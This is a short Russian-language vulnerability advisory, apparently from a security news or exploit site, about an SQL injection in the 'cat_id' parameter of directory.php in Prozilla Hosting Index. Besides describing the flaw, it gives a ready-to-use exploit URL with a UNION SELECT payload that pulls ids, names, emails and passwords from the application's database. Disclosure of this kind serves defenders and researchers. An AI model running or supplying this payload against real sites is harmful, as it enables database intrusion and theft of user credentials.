Программа: Prozilla Hosting Index

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cat_id» сценарием directory.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://www.target.com/[hostindex_path]/directory.php?ax=list&sub=7&cat_id= -1%20union%20select%201,2,concat(id,0x3a,name,0x3a,email,0x3a,password), 4,5,6,7,8,9,10,11,12,13,14%20from%20links—



Оставить мнение